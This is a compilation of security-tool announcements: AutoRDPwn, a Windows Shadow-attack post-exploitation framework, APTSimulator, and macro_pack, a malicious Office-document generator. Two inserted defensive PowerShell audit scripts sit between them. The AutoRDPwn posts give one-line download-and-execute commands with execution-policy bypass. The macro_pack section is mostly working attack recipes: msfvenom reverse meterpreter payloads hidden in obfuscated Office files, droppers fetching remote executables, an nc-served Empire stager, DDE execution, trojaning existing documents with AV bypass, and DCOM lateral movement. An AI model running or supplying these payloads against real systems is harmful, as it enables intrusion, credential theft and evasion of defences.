AutoRDPwn v5.0 – The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.

Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script

*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers.

When used remotely in a reverse shell, it is necessary to use the following parameters:
• -admin / -noadmin -> Depending on the permissions we have, we will use one or the other
• -nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
• -lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
• -option -> As with the menu, we can choose how to launch the attack
• -shadow -> We will decide if we want to see or control the remote device
• -createuser -> This parameter is optional; the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine

Local execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments

This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System by HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM by Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload by Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher by Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher

And many more that do not fit here. Thanks to all of them and their excellent work.

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net
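Added here as a defensive counterpart, not part of AutoRDPwn: a read-only PowerShell check of the two host-side conditions the Shadow attack above depends on, the Remote Desktop Services remote-control policy and the local user that the -createuser parameter leaves behind. The policy key, its 'Shadow' value and the value meanings are assumed from the Windows Group Policy setting "Set rules for remote control of Remote Desktop Services user sessions"; the post itself does not name them.

```powershell
# Added defensive check (not AutoRDPwn code). Read-only; run in an elevated PowerShell.
# Assumption: the Shadow attack relies on the RDS remote-control policy below allowing
# a session to be viewed or controlled without a consent prompt (values 2 and 4).
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'

$shadowMeaning = @{
    0 = 'remote control disabled'
    1 = 'full control, user consent required'
    2 = 'full control, NO consent required'
    3 = 'view only, user consent required'
    4 = 'view only, NO consent required'
}

function Get-ShadowPolicyStatus {
    # DWORD 'Shadow' under the policy key; absent when no policy is configured
    $value = (Get-ItemProperty -Path $policyKey -Name 'Shadow' -ErrorAction SilentlyContinue).Shadow
    if ($null -eq $value) {
        return [pscustomobject]@{ Setting = 'not configured (no policy set)'; Risk = 'review' }
    }
    $risk = if ($value -in @(2, 4)) { 'HIGH: consent prompt disabled, session can be shadowed silently' }
            elseif ($value -eq 0)   { 'none: shadowing disabled' }
            else                    { 'low: consent prompt enforced' }
    [pscustomobject]@{ Setting = "$value ($($shadowMeaning[[int]$value]))"; Risk = $risk }
}

function Test-AutoRDPwnUser {
    # The -createuser parameter creates a local account named AutoRDPwn (see the post above);
    # its presence is a direct indicator that the tool was run against this host.
    $u = Get-LocalUser -Name 'AutoRDPwn' -ErrorAction SilentlyContinue
    if ($u) { "local user 'AutoRDPwn' exists (enabled: $($u.Enabled)); remove it and review its group memberships" }
    else    { "no 'AutoRDPwn' local user present" }
}

Get-ShadowPolicyStatus | Format-List
Test-AutoRDPwnUser
```

A configured value of 2 or 4, or an unexpected local account, is worth correlating with recent Remote Desktop Services logons on the same host.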

Link: http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

Powershell 4.0 or higher

Changes

Version 4.8
• Compatibility with Powershell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PsExec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter

*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments

• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

Powershell 5.0 or higher

Changes

Version 4.5
• New ninja style icon!
• Automatic cleaning of Powershell history after execution
• Now all dependencies are downloaded from the same repository
• Many errors and bugs fixed
• UAC & AMSI bypass in 64-bit systems
• New module available: Remote Desktop Caching
• New module available: Disable system logs (Invoke-Phant0m)
• New module available: Sticky Keys Hacking
• New available module: Remote Desktop History
• New available attack: Session Hijacking (passwordless)
  WARNING! This attack is very intrusive and can only be used locally

*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.

One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments

• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

Powershell 5.0 or higher

Changes

Version 4.0
• Fixed a bug in the scheduled task to remove the user AutoRDPwn
• The Scheduled Task attack has been replaced by Invoke-Command
• It is now possible to choose the language of the application and launch the attack on English versions of Windows

*The rest of the changes can be consulted in the CHANGELOG file

Use

Execution in one line:
powershell -ExecutionPolicy Bypass "cd $env:TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments

• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

APTSimulator – A toolset to make a system look as if it was the victim of an APT attack

APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.

Use Cases

• POCs: Endpoint detection agents / compromise assessment tools
• Test your security monitoring's detection capabilities
• Test your SOC's response on a threat that isn't EICAR or a port scan
• Prepare an environment for digital forensics classes

Motives

Customers tested our scanners in a POC and sent us a complaint that our scanners didn't report on programs that they had installed on their test systems. They had installed Nmap, dropped a PsExec.exe in the Downloads folder and placed an EICAR test virus on the user's Desktop. That was the moment when I decided to build a tool that simulates a real threat in a more appropriate way.

Why Batch?

Because it's simple:
• Everyone can read, modify or extend it
• It runs on every Windows system without any prerequisites
• It is closest to a real attacker working on the command line

Focus

The focus of this tool is to simulate adversary activity, not malware.

Getting Started

1. Download the latest release from the "release" section
2. Extract the package on a demo system (Password: apt)
3. Start a cmd.exe as Administrator
4. Navigate to the extracted program folder and run APTSimulator.bat

Avoiding Early Detection

The batch script extracts the tools and shells from an encrypted 7z archive at runtime. Do not download the master repo using the "download as ZIP" button. Instead use the official release from the release section.

Extending the Test Set

Since version 0.4 it is pretty easy to extend the test sets by adding a single .bat file to one of the test-set category folders. E.g. if you want to write a simple use case for "privilege escalation" that uses a tool named "privesc.exe", clone the repo and do the following:

1. Add your tool to the toolset folder
2. Write a new batch script privesc-1.bat and add it to the ./test-sets/privilege-escalation folder
3. Run build_pack.bat
4. Add your test to the table and action list in the README.md
5. Create a pull request

Tool and File Extraction

If your script includes a tool, web shell, auxiliary or output file, place them in the folders ./toolset or ./workfiles. Running the build script build_pack.bat will include them in the encrypted archives enc-toolset.7z and enc-files.7z.

Extract a Tool
%ZIP% e -p%PASS% %TOOLARCH% -aoa -o%APTDIR% toolset\tool.exe > NUL

Extract a File
%ZIP% e -p%PASS% %FILEARCH% -aoa -o%APTDIR% workfile\tool-output.txt > NUL

Detection

The following table shows the different test cases and the expected detection results.

AV = Antivirus
NIDS = Network Intrusion Detection System
EDR = Endpoint Detection and Response
SM = Security Monitoring
CA = Compromise Assessment

Columns: Test Case | AV | NIDS | EDR | SM | CA
• Dumps (Pwdump, Dir Listing): X
• Recon Activity (Typical Commands): X X X
• DNS (Cache Injection): (X) X X X
• Eventlog (WCE entries): X X X
• Hosts File (AV/Win Update blocks): (X) X X
• Backdoor (StickyKey file/debugger): X X
• Obfuscation (RAR with JPG ext): (X)
• Web Shells (a good selection): X (X) X
• Ncat Alternative (Drop & Exec): X X X X
• Remote Execution Tool (Drop): (X) X
• Mimikatz (Drop & Exec): X X X X
• PsExec (Drop & Exec): X X X
• At Job Creation: X X X
• RUN Key Entry Creation: X X X
• System File in Susp Loc (Drop & Exec): X X X
• Guest User (Activation & Admin): X X X
• LSASS Dump (with Procdump): X X X
• C2 Requests: (X) X X X
• Malicious User Agent (Malware, RATs): X X X
• Scheduled Task Creation: X X X
• Nbtscan Discovery (Scan & Output): X X (X) X

Test Cases

1. Dumps
   • Drops pwdump output to the working dir
   • Drops directory listing to the working dir
2. Recon
   • Executes commands used by attackers to get information about a target system
3. DNS
   • Looks up several well-known C2 addresses to cause DNS requests and get the addresses into the local DNS cache
4. Eventlog
   • Creates Windows Eventlog entries that look as if WCE had been executed
5. Hosts
   • Adds entries to the local hosts file (update blocker, entries caused by malware)
6. Sticky Key Backdoor
   • Tries to replace sethc.exe with cmd.exe (a backup file is created)
   • Tries to register cmd.exe as debugger for sethc.exe
7. Obfuscation
   • Drops a cloaked RAR file with JPG extension
8. Web Shells
   • Creates a standard web root directory
   • Drops standard web shells to that directory
   • Drops GIF obfuscated web shell to that directory
9. Ncat Alternative
   • Drops a PowerShell Ncat alternative to the working directory
10. Remote Execution Tool
   • Drops a remote execution tool to the working directory
11. Mimikatz
   • Dumps mimikatz output to working directory (fallback if other executions fail)
   • Runs special version of mimikatz and dumps output to working directory
   • Runs Invoke-Mimikatz in memory (github download, reflection)
12. PsExec
   • Dumps a renamed version of PsExec to the working directory
   • Runs PsExec to start a command line in LOCAL_SYSTEM context
13. At Job
   • Creates an at job that runs mimikatz and dumps credentials to file
14. RUN Key
   • Creates a suspicious new RUN key entry that dumps "net user" output to a file
15. System File Suspicious Location
   • Drops suspicious executable with system file name (svchost.exe) in %PUBLIC% folder
   • Runs that suspicious program in %PUBLIC% folder
16. Guest User
   • Activates Guest user
   • Adds Guest user to the local administrators
17. LSASS DUMP
   • Dumps LSASS process memory to a suspicious folder
18. C2 Requests
   • Uses Curl to access well-known C2 servers
19. Malicious User Agents
   • Uses malicious user agents to access web sites
20. Scheduled Task Creation
   • Creates a scheduled task that runs mimikatz and dumps the output to a file
21. Nbtscan Discovery
   • Scans 3 private IP address class-C subnets and dumps the output to the working directory

Warning

This repo contains tools and executables that can harm your system's integrity and stability. Do only use them on non-productive test or demo systems.

Advanced Solutions

• The CALDERA automated adversary emulation system https://github.com/mitre/caldera
• Infection Monkey – An automated pentest tool https://github.com/guardicore/monkey
• Flightsim – A utility to generate malicious network traffic and evaluate controls https://github.com/alphasoc/flightsim

Integrated Projects / Software

• Mimikatz
• PowerSploit
• PowerCat
• PsExec
• ProcDump
• 7Zip
• curl
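Added defensive example, not APTSimulator's own code: a read-only PowerShell audit that looks for the host artifacts the test cases above leave behind (sticky keys debugger or replaced binary, hosts file entries, RUN key entry, svchost.exe under %PUBLIC%, Guest activation, mimikatz scheduled tasks), so a blue team can compare what its EDR, SM and CA tooling actually surfaced against the table. Paths, registry keys and the Get-LocalUser, Get-LocalGroupMember and Get-ScheduledTask cmdlets are standard Windows ones; matching the task action on the string "mimikatz" is an assumption about how the simulator names its action.

```powershell
# Added defensive audit (not APTSimulator code). Read-only: run in an elevated
# PowerShell on the demo system after APTSimulator.bat has finished.
$findings = New-Object 'System.Collections.Generic.List[string]'

function Add-Finding([string]$Case, [string]$Detail) {
    # $findings is a reference type, so the parent-scope list is updated in place
    $findings.Add(("[{0}] {1}" -f $Case, $Detail))
}

# Test case 6: Sticky Keys backdoor via IFEO debugger, or sethc.exe replaced by cmd.exe
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
if (Test-Path $ifeo) {
    $dbg = (Get-ItemProperty -Path $ifeo -ErrorAction SilentlyContinue).Debugger
    if ($dbg) { Add-Finding 'Sticky Keys' "IFEO debugger registered for sethc.exe: $dbg" }
}
$sethc = Join-Path $env:SystemRoot 'System32\sethc.exe'
$cmd   = Join-Path $env:SystemRoot 'System32\cmd.exe'
if ((Test-Path $sethc) -and (Test-Path $cmd) -and
    ((Get-FileHash $sethc).Hash -eq (Get-FileHash $cmd).Hash)) {
    Add-Finding 'Sticky Keys' 'sethc.exe has the same SHA256 as cmd.exe (binary replaced)'
}

# Test case 5: every non-comment hosts entry (a stock hosts file has none)
$hosts = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
Get-Content $hosts -ErrorAction SilentlyContinue |
    Where-Object { $_.Trim() -ne '' -and $_ -notmatch '^\s*#' } |
    ForEach-Object { Add-Finding 'Hosts file' "active entry: $($_.Trim())" }

# Test case 14: RUN key values that run "net user" or redirect output to a file
foreach ($hive in 'HKLM:', 'HKCU:') {
    $run = "$hive\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    if (-not (Test-Path $run)) { continue }
    foreach ($p in (Get-ItemProperty -Path $run).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSChildName/... metadata
        if ("$($p.Value)" -match 'net(\.exe)?\s+user|>') {
            Add-Finding 'RUN key' "$run\$($p.Name) = $($p.Value)"
        }
    }
}

# Test case 15: a binary carrying a system file name under %PUBLIC%
Get-ChildItem -Path $env:PUBLIC -Filter 'svchost.exe' -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'System file in susp. location' $_.FullName }

# Test case 16: Guest account enabled and/or member of Administrators
$guest = Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue
if ($guest -and $guest.Enabled) { Add-Finding 'Guest user' 'Guest account is enabled' }
$admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue
if ($admins | Where-Object { $_.Name -like '*\Guest' }) {
    Add-Finding 'Guest user' 'Guest is a member of the local Administrators group'
}

# Test cases 13 and 20: at jobs / scheduled tasks whose action mentions mimikatz
# (assumption: the simulator's task action keeps the tool name in its command line)
foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    foreach ($a in $task.Actions) {
        if ("$($a.Execute) $($a.Arguments)" -match 'mimikatz') {
            Add-Finding 'Scheduled task' "$($task.TaskPath)$($task.TaskName) -> $($a.Execute) $($a.Arguments)"
        }
    }
}

if ($findings.Count -eq 0) { 'No APTSimulator host artifacts found.' } else { $findings }
```

Every line this prints corresponds to one row of the detection table; anything it finds that your monitoring did not raise is a gap in the EDR, SM or CA column for that row.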

Link: http://feedproxy.google.com/~r/PentestTools/~3/rAND2a8X3zQ/aptsimulator-toolset-to-make-system.html

macro_pack – Tool Used To Automatize Obfuscation And Generation Of Ms Office Documents For Pentest, Demo, And Social Engineering Assessments

The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from vba generation to final Office document generation.It is very simple to use:No configurationEverything can be done using a single line of codeGeneration of majority of Office formats and VBS based formatsAdvanced VBA macro attacks as well as DDE attacksThe tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. This tool is written in Python3 and works on both Linux and Windows platform.Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.ObfuscationThe tool will use various obfuscation techniques, all automatic. Obfuscation feature is competible with all format that can be generated by macri_pack, VBA or VBS based.Basic obfuscation (-o option) includes:Renaming functionsRenaming variablesRemoving spacesRemoving commentsEncoding StringsNote that the main goal of macro_pack obfuscation is not to prevent reverse engineering, it is to prevent antivirus detection.GenerationMacro Pack can generate several kinds of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. 
File generation is done using the option –generate or -G.Macro Pack pro version also allow to trojan existing files with option –trojan or -TMs Office Supported formats are:MS Word 97 (.doc)MS Word (.docm, .docx)MS Excel 97 (.xls)MS Excel (.xlsm)MS PowerPoint (.pptm)MS Visio 97 (.vsd)MS Visio (.vsdm)MS Project (.mpp)Scripting (txt) supported formats are:VBA text file (.vba)VBS text file (.vbs)Windows Script Host (.wsh)Windows Script Components scriptlets (.wsc, .sct)HTML Applications (.hta)Note that all scripting formats can be generated on Linux version of macro_pack as well.Ethical useThe macro_pack tool shall only be used by pentester, security researchers, or other people with learning purpose. I condamn all use of security tools for unethical actions (weather these ar legal or illegal). I know this will not prevent usage by malicious people and that is why all features are not publicly released.About pro mode…You may notice that not all part of macro_pack is available. Only the community version is available online. I fear the features in the pro version are really too much “weaponizing" the process and I do not want it available to all script kiddies out there. 
The pro mode includes features such as:Advance antimalware bypassVBOM security bypassSelf decoding VBAMS Office persistanceTrojan existing MS Office documentsLateral movement using DCOM objectsAnti-debug using http://seclists.org/fulldisclosure/2017/Mar/90For now I do not plan to release or sell this pro version however if you are really interrested I can share pro binary in the next case:You significally contribute to macro_pack on GitHub + I need to know your identityRun/InstallRun Windows binaryGet the latest binary from https://github.com/sevagas/macro_pack/releases/Download binary on PC with genuine Microsoft Office installed.Open console, CD to binary dir and call the binary, simple as that!macro_pack.exe –helpInstall from sourcesDownload and install dependencies:git clone https://github.com/sevagas/macro_pack.gitcd macro_packpip3 install -r requirements.txtNote: For windows, you also need to download manually pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/The tool is in python 3 so just start with with your python3 install. 
ex:python3 macro_pack.py –help# orpython macro_pack.py –help # if python3 is default installIf you want to produce a standalone exe using pyinstaller:Install PyCrypto at http://www.voidspace.org.uk/python/pycrypto-2.6.1/Double-click on the "build.bat" script on a Windows machine.The resulted macro_pack.exe will be inside the bin directory.Some examplesmacro_pack communityObfuscate the vba file generated by msfvenom and put result in a new vba file.msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vbaObfuscate Empire stager vba file and generate a MS Word document:macro_pack.exe -f empire.vba -o -G myDoc.docmGenerate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder:msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \\REMOTE-PC\Share\meter.doc Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template# 1 Generate a fiez containing Empire lauchcher # 2 Make that file available on web server, ex with netcat:{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1# 3 Use macro\_pack to generate DROPPER_PS payload in Excel fileecho http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.Execute calc.exe via Dynamic Data Exchange (DDE) attackecho calc.exe | macro_pack.exe –dde -G dde_test.docxDownload and execute file via powershell using Dynamic Data Exchange (DDE) attack# 1 Change the target file URL in resources\community\ps_dl_exec.cmd# 2 Embed download execute cmd in documentpython macro_pack.py –dde -f 
..\resources\community\ps_dl_exec.cmd -G DDE.docGenerate obfuscated Meterpreter reverse TCP VBS file and run it# 1 Generate obfuscated VBS based on meterpreter templateecho <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs# 2 On attacker machinge Setup meterpreter listenerOpen msfconsole:use exploit/multi/handlerset LHOST 0.0.0.0set PAYLOAD windows/meterpreter/reverse_tcpset AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding true# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)%windir%\SysWoW64\wscript meter.vbsGenerated obfuscated HTA file which executes "systeminfo" and returns result to another macro_pack listening on 192.168.0.5# 1 Generate HTA file with CMD templateecho http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t CMD -o -G info.hta# 2 On 192.168.0.5 open macro_pack as http listenermacro_pack.exe -l 1234# 3 run hta file with mshtamshta.exe full/path/to/info.htaGenerate obfuscated Meterpreter reverse https TCP SCT file and run it# 1 Generate obfuscated VBS scriptlet based on meterpreter reverse HTTPS templateecho <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.sct# 2 On attacker machinge Setup meterpreter listenerOpen msfconsole:use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_httpsset LHOST <attacker_ip> # NOTE this cannot be 0.0.0.0 for reverse httpsset LPORT <port>set AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -j# 3 run scriptlet with regsvr32 regsvr32 /u /n /s /i:meter.sct scrobj.dllmacro_pack proTrojan the existing shared "report.xlsm" file with a dropper. 
Use anti-AV and anti-debug features.echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER2 –trojan –av-bypass –stealth -G "E:\accounting\report.xls" Genenerate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o –vbom-encode –keep-alive -G out.docmTrojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass most antiviruses.msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o –av-bypass –trojan -G hotpics.pptmExecute a macro on a remote PC using DCOMREM Step 1: Ensure you have enough rightsnet use \\192.168.0.8\c$ /user:domain\username passwordREM Step 2: Generate document, for example here, meterpreter reverse TCP Excel fileecho 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsmREM Step 3: Copy the document somewhere on remote sharecopy meter.xlsm "\\192.168.0.8\c$\users\username\meter.xlsm"REM Step 4: Execute!macro_pack.exe –dcom="\\192.168.0.8\c$\users\username\meter.xlsm"REM Step 2 to 4 in one step:echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\users\username\meter.xlsm" –dcom="\\192.168.0.8\c$\users\username\meter.xlsm"All available optionsGeneral options: -f, –input-file=INPUT_FILE_PATH A VBA macro file or file containing params for –template option If no input file is provided, input must be passed via stdin (using a pipe). -q, –quiet Do not display anything on screen, just process request. 
-o, –obfuscate Same as ‘–obfuscate-form –obfuscate-names –obfuscate-strings’ –obfuscate-form Modify readability by removing all spaces and comments in VBA –obfuscate-strings Randomly split strings and encode them –obfuscate-names Change functions, variables, and constants names -s, –start-function=START_FUNCTION Entry point of macro file Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open as the start function -t, –template=TEMPLATE_NAME Use VBA template already included in macro_pack.exe. Available templates are: HELLO, CMD, DROPPER, DROPPER2, DROPPER_PS, DROPPER_DLL, METERPRETER, EMBED_EXE Help for template usage: macro_pack.exe -t help -G, –generate=OUTPUT_FILE_PATH. Generates a file containing the macro. Will guess the format based on extension. Supported extensions are: vba, vbs, hta, doc, docm, xls, xlsm, pptm, vsd, vsdm. Note: Apart from vba which is a text files, all other requires Windows OS with right MS Office application installed. -e, –embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document. Use with EMBED_EXE template to auto drop and exec the file. –dde Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE DDE attack mode is not compatible with VBA Macro related options. Usage: echo calc.exe | macro_pack.exe –dde -W DDE.docx Note: This option requires Windows OS with genuine MS Office installed. –run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations. This will trigger AutoOpen/Workbook_Open automatically. If no auto start function, use –start-function option to indicate which macro to run. -l, –listen=PORT Open an HTTP server listening on defined port. -h, –help Displays help and exit Notes: If no output file is provided, the result will be displayed on stdout. 
Combine this with the -q option to pipe only the processed result into another program, ex: macro_pack.exe -f my_vba.vba -o -q | another_app
Another valid usage is: cat input_file.vba | macro_pack.exe -o -q > output_file.vba

macro_pack Pro only:
--vbom-encode   Use VBA self-encoding to bypass antimalware detection and enable VBOM access (exploits the VBOM self-activation vulnerability). The --start-function option may be needed.
--av-bypass     Use various tricks that are efficient at bypassing most AV (combine with -o for best results).
--keep-alive    Use with the --vbom-encode option. Ensures the new application instance stays alive even after the macro has finished.
--persist       Use with the --vbom-encode option. The macro is automatically persisted in the application startup path (works with Excel documents only). It will then be executed any time an Excel document is opened (even non-macro documents).
